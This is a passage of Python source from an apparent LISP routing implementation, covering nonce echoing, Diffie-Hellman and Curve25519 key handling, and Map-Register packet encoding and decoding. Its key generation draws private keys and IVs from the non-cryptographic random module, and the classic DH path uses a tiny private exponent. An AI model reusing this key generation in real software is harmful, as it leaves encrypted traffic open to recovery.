self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce = byte_swap_64(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
